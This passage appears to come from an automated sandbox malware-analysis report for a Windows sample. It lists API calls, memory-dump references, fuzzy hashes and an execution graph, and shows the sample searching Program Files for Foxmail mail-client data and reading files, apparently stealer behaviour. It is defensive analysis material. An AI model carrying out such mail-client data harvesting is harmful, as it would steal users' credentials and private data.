                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                    • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                    • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
                                                                                                                                                                                    Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                    • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                    Function 00405A63 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:1.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                    Total number of Nodes:214
                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                    execution_graph 8525 367b1c5b 8526 367b1c6b 8525->8526 8529 367b12ee 8526->8529 8528 367b1c87 8530 367b1324 8529->8530 8531 367b13b7 GetEnvironmentVariableW 8530->8531 8555 367b10f1 8531->8555 8534 367b10f1 57 API calls 8535 367b1465 8534->8535 8536 367b10f1 57 API calls 8535->8536 8537 367b1479 8536->8537 8538 367b10f1 57 API calls 8537->8538 8539 367b148d 8538->8539 8540 367b10f1 57 API calls 8539->8540 8541 367b14a1 8540->8541 8542 367b10f1 57 API calls 8541->8542 8543 367b14b5 lstrlenW 8542->8543 8544 367b14d9 lstrlenW 8543->8544 8545 367b14d2 8543->8545 8546 367b10f1 57 API calls 8544->8546 8545->8528 8547 367b1501 lstrlenW lstrcatW 8546->8547 8548 367b10f1 57 API calls 8547->8548 8549 367b1539 lstrlenW lstrcatW 8548->8549 8550 367b10f1 57 API calls 8549->8550 8551 367b156b lstrlenW lstrcatW 8550->8551 8552 367b10f1 57 API calls 8551->8552 8553 367b159d lstrlenW lstrcatW 8552->8553 8554 367b10f1 57 API calls 8553->8554 8554->8545 8556 367b1118 8555->8556 8557 367b1129 lstrlenW 8556->8557 8568 367b2c40 8557->8568 8560 367b1168 lstrlenW 8561 367b1177 lstrlenW FindFirstFileW 8560->8561 8562 367b11e1 8561->8562 8563 367b11a0 8561->8563 8562->8534 8564 367b11aa 8563->8564 8565 367b11c7 FindNextFileW 8563->8565 8564->8565 8570 367b1000 8564->8570 8565->8563 8567 367b11da FindClose 8565->8567 8567->8562 8569 367b1148 lstrcatW lstrlenW 8568->8569 8569->8560 8569->8561 8571 367b1022 8570->8571 8572 367b10af 8571->8572 8573 367b102f lstrcatW lstrlenW 8571->8573 8574 367b10b5 lstrlenW 8572->8574 8585 367b10ad 8572->8585 8575 367b106b lstrlenW 8573->8575 8576 367b105a lstrlenW 8573->8576 8601 367b1e16 8574->8601 8587 367b1e89 lstrlenW 8575->8587 8576->8575 8579 367b10ca 8582 367b1e89 5 API calls 8579->8582 8579->8585 8580 367b1088 GetFileAttributesW 8581 367b109c 8580->8581 8580->8585 8581->8585 8593 367b173a 8581->8593 8584 367b10df 8582->8584 8606 367b11ea 8584->8606 8585->8564 8588 367b2c40 8587->8588 8589 367b1ea7 lstrcatW lstrlenW 8588->8589 8590 367b1ec2 8589->8590 8591 367b1ed1 lstrcatW 8589->8591 8590->8591 8592 367b1ec7 lstrlenW 8590->8592 8591->8580 8592->8591 8594 367b1747 8593->8594 8621 367b1cca 8594->8621 8598 367b199f 8598->8585 8599 367b1824 8599->8598 8641 367b15da 8599->8641 8602 367b1e29 8601->8602 8605 367b1e4c 8601->8605 8603 367b1e2d lstrlenW 8602->8603 8602->8605 8604 367b1e3f lstrlenW 8603->8604 8603->8605 8604->8605 8605->8579 8607 367b120e 8606->8607 8608 367b1e89 5 API calls 8607->8608 8609 367b1220 GetFileAttributesW 8608->8609 8610 367b1246 8609->8610 8611 367b1235 8609->8611 8612 367b1e89 5 API calls 8610->8612 8611->8610 8613 367b173a 35 API calls 8611->8613 8614 367b1258 8612->8614 8613->8610 8615 367b10f1 56 API calls 8614->8615 8616 367b126d 8615->8616 8617 367b1e89 5 API calls 8616->8617 8618 367b127f 8617->8618 8619 367b10f1 56 API calls 8618->8619 8620 367b12e6 8619->8620 8620->8585 8622 367b1cf1 8621->8622 8623 367b1d0f CopyFileW CreateFileW 8622->8623 8624 367b1d55 GetFileSize 8623->8624 8625 367b1d44 DeleteFileW 8623->8625 8626 367b1ede 22 API calls 8624->8626 8630 367b1808 8625->8630 8627 367b1d66 ReadFile 8626->8627 8628 367b1d7d CloseHandle DeleteFileW 8627->8628 8629 367b1d94 CloseHandle DeleteFileW 8627->8629 8628->8630 8629->8630 8630->8598 8631 367b1ede 8630->8631 8635 367b222f 8631->8635 8633 367b224e 8633->8599 8635->8633 8637 367b2250 8635->8637 8649 367b474f 8635->8649 8654 367b47e5 8635->8654 8636 367b2908 8638 367b35d2 RaiseException 8636->8638 8637->8636 8661 367b35d2 8637->8661 8640 367b2925 8638->8640 8640->8599 8642 367b160c 8641->8642 8643 367b163c lstrlenW 8642->8643 8749 367b1c9d 8643->8749 8645 367b1655 lstrcatW lstrlenW 8646 367b1678 8645->8646 8647 367b167e lstrcatW 8646->8647 8648 367b1693 8646->8648 8647->8648 8648->8599 8664 367b4793 8649->8664 8652 367b478f 8652->8635 8653 367b4765 8670 367b2ada 8653->8670 8659 367b56d0 8654->8659 8655 367b570e 8683 367b6368 8655->8683 8657 367b56f9 RtlAllocateHeap 8658 367b570c 8657->8658 8657->8659 8658->8635 8659->8655 8659->8657 8660 367b474f 7 API calls 8659->8660 8660->8659 8662 367b35f2 RaiseException 8661->8662 8662->8636 8665 367b479f 8664->8665 8677 367b5671 RtlEnterCriticalSection 8665->8677 8667 367b47aa 8678 367b47dc 8667->8678 8669 367b47d1 8669->8653 8671 367b2ae3 8670->8671 8672 367b2ae5 IsProcessorFeaturePresent 8670->8672 8671->8652 8674 367b2b58 8672->8674 8682 367b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8674->8682 8676 367b2c3b 8676->8652 8677->8667 8681 367b56b9 RtlLeaveCriticalSection 8678->8681 8680 367b47e3 8680->8669 8681->8680 8682->8676 8686 367b5b7a GetLastError 8683->8686 8687 367b5b99 8686->8687 8688 367b5b93 8686->8688 8692 367b5bf0 SetLastError 8687->8692 8712 367b637b 8687->8712 8705 367b5e08 8688->8705 8694 367b5bf9 8692->8694 8693 367b5bb3 8719 367b571e 8693->8719 8694->8658 8698 367b5bb9 8700 367b5be7 SetLastError 8698->8700 8699 367b5bcf 8732 367b593c 8699->8732 8700->8694 8703 367b571e 17 API calls 8704 367b5be0 8703->8704 8704->8692 8704->8700 8737 367b5c45 8705->8737 8707 367b5e2f 8708 367b5e47 TlsGetValue 8707->8708 8709 367b5e3b 8707->8709 8708->8709 8710 367b2ada 5 API calls 8709->8710 8711 367b5e58 8710->8711 8711->8687 8717 367b6388 8712->8717 8713 367b63c8 8716 367b6368 19 API calls 8713->8716 8714 367b63b3 RtlAllocateHeap 8715 367b5bab 8714->8715 8714->8717 8715->8693 8725 367b5e5e 8715->8725 8716->8715 8717->8713 8717->8714 8718 367b474f 7 API calls 8717->8718 8718->8717 8720 367b5729 HeapFree 8719->8720 8721 367b5752 8719->8721 8720->8721 8722 367b573e 8720->8722 8721->8698 8723 367b6368 18 API calls 8722->8723 8724 367b5744 GetLastError 8723->8724 8724->8721 8726 367b5c45 5 API calls 8725->8726 8727 367b5e85 8726->8727 8728 367b5ea0 TlsSetValue 8727->8728 8729 367b5e94 8727->8729 8728->8729 8730 367b2ada 5 API calls 8729->8730 8731 367b5bc8 8730->8731 8731->8693 8731->8699 8743 367b5914 8732->8743 8741 367b5c71 8737->8741 8742 367b5c75 8737->8742 8738 367b5c95 8740 367b5ca1 GetProcAddress 8738->8740 8738->8742 8739 367b5ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8739->8741 8740->8742 8741->8738 8741->8739 8741->8742 8742->8707 8744 367b5854 RtlEnterCriticalSection RtlLeaveCriticalSection 8743->8744 8745 367b5938 8744->8745 8746 367b58c4 8745->8746 8747 367b5758 20 API calls 8746->8747 8748 367b58e8 8747->8748 8748->8703 8750 367b1ca6 8749->8750 8750->8645 8751 367bc7a7 8752 367bc7be 8751->8752 8761 367bc82c 8751->8761 8752->8761 8763 367bc7e6 GetModuleHandleA 8752->8763 8754 367bc872 8755 367bc835 GetModuleHandleA 8756 367bc83f 8755->8756 8756->8756 8758 367bc85f GetProcAddress 8756->8758 8756->8761 8757 367bc7dd 8757->8756 8759 367bc800 GetProcAddress 8757->8759 8757->8761 8758->8761 8760 367bc80d VirtualProtect 8759->8760 8759->8761 8760->8761 8762 367bc81c VirtualProtect 8760->8762 8761->8754 8761->8755 8761->8756 8762->8761 8764 367bc7ef 8763->8764 8769 367bc82c 8763->8769 8775 367bc803 GetProcAddress 8764->8775 8766 367bc7f4 8766->8769 8770 367bc800 GetProcAddress 8766->8770 8767 367bc872 8768 367bc835 GetModuleHandleA 8773 367bc83f 8768->8773 8769->8767 8769->8768 8769->8773 8770->8769 8771 367bc80d VirtualProtect 8770->8771 8771->8769 8772 367bc81c VirtualProtect 8771->8772 8772->8769 8773->8769 8774 367bc85f GetProcAddress 8773->8774 8774->8769 8776 367bc82c 8775->8776 8777 367bc80d VirtualProtect 8775->8777 8779 367bc872 8776->8779 8780 367bc835 GetModuleHandleA 8776->8780 8777->8776 8778 367bc81c VirtualProtect 8777->8778 8778->8776 8782 367bc83f 8780->8782 8781 367bc85f GetProcAddress 8781->8782 8782->8776 8782->8781

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 367B10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1137
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1151
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B115C
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B116D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B117C
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1193
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 367B11D0
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 367B11DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                    • Opcode ID: 7e5e96f8ce171e4e0e1670a0576c719b7de1ce7bad6b3ea7206d50f545897986
                                                                                                                                                                                    • Instruction ID: b5b2c1260c0f6f7a3075e0583311cabcba8dc19719c921d16c601a0a3d621846
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e5e96f8ce171e4e0e1670a0576c719b7de1ce7bad6b3ea7206d50f545897986
                                                                                                                                                                                    • Instruction Fuzzy Hash: F721827290434CABDB20EA649C4CF9B7B9DEF84314F44092AFA69D7190EB70D605C796
                                                                                                                                                                                    Function 367B12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 367B1434
                                                                                                                                                                                      • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1137
                                                                                                                                                                                      • Part of subcall function 367B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1151
                                                                                                                                                                                      • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B115C
                                                                                                                                                                                      • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B116D
                                                                                                                                                                                      • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B117C
                                                                                                                                                                                      • Part of subcall function 367B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1193
                                                                                                                                                                                      • Part of subcall function 367B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 367B11D0
                                                                                                                                                                                      • Part of subcall function 367B10F1: FindClose.KERNEL32(00000000), ref: 367B11DB
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 367B14C5
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 367B14E0
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 367B150F
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 367B1521
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 367B1547
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 367B1553
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 367B1579
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 367B1585
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 367B15AB
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 367B15B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                    • Opcode ID: fbc90490aa71fabf2d106dc56cc8ea3143bc7752691f9927017fb71c601b6cb5
                                                                                                                                                                                    • Instruction ID: e01aae39f1eb7520c19eb8d09f7c15cc044198385cca0b29e8f098a927555109
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbc90490aa71fabf2d106dc56cc8ea3143bc7752691f9927017fb71c601b6cb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C281D471A10358A9DF20DBA0DC85FEE7B39EF84700F4005A6F609EB190EB759A85CF95
                                                                                                                                                                                    Function 367BC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(367BC7DD), ref: 367BC7E6
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
                                                                                                                                                                                      • Part of subcall function 367BC803: GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
                                                                                                                                                                                      • Part of subcall function 367BC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
                                                                                                                                                                                      • Part of subcall function 367BC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 4c23f2894b53e24bdc6cb03620d872527e4aa4cde49508ade87e729b7c52d10e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A012844D453513CFF1156750C09ABA6FDA9B276A0BD0D7A6E250CF193DEA08506C3F7
                                                                                                                                                                                    Function 367BC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 80 367bc7a7-367bc7bc 81 367bc7be-367bc7c6 80->81 82 367bc82d 80->82 81->82 83 367bc7c8-367bc7f6 call 367bc7e6 81->83 84 367bc82f-367bc833 82->84 91 367bc7f8 83->91 92 367bc86c 83->92 86 367bc872 call 367bc877 84->86 87 367bc835-367bc83d GetModuleHandleA 84->87 90 367bc83f-367bc847 87->90 90->90 93 367bc849-367bc84c 90->93 95 367bc85b-367bc85e 91->95 96 367bc7fa-367bc7fc 91->96 94 367bc86d-367bc86e 92->94 93->84 97 367bc84e-367bc850 93->97 98 367bc870 94->98 99 367bc866-367bc86b 94->99 100 367bc85f-367bc860 GetProcAddress 95->100 96->94 101 367bc7fe 96->101 102 367bc852-367bc854 97->102 103 367bc856-367bc85a 97->103 98->93 99->92 105 367bc865 100->105 104 367bc800-367bc80b GetProcAddress 101->104 101->105 102->100 103->95 104->82 106 367bc80d-367bc81a VirtualProtect 104->106 105->99 107 367bc82c 106->107 108 367bc81c-367bc82a VirtualProtect 106->108 107->82 108->107
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
                                                                                                                                                                                      • Part of subcall function 367BC7E6: GetModuleHandleA.KERNEL32(367BC7DD), ref: 367BC7E6
                                                                                                                                                                                      • Part of subcall function 367BC7E6: GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
                                                                                                                                                                                      • Part of subcall function 367BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
                                                                                                                                                                                      • Part of subcall function 367BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 38a287221bb864a08eec9e35cc4bf0df81a49f50ffc74c275539a26101e858c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 622148668183816FFF118B754C04BB67FDA9B132B0F98C696D180CF143D6A89446C3F2
                                                                                                                                                                                    Function 367BC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 109 367bc803-367bc80b GetProcAddress 110 367bc82d 109->110 111 367bc80d-367bc81a VirtualProtect 109->111 114 367bc82f-367bc833 110->114 112 367bc82c 111->112 113 367bc81c-367bc82a VirtualProtect 111->113 112->110 113->112 115 367bc872 call 367bc877 114->115 116 367bc835-367bc83d GetModuleHandleA 114->116 118 367bc83f-367bc847 116->118 118->118 119 367bc849-367bc84c 118->119 119->114 120 367bc84e-367bc850 119->120 121 367bc852-367bc854 120->121 122 367bc856-367bc85e 120->122 124 367bc85f-367bc865 GetProcAddress 121->124 122->124 126 367bc866-367bc86e 124->126 129 367bc870 126->129 129->119
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 71530bfd0b6a74d3f31a946c2041dc147e8d863b820d068379050e32daba8f44
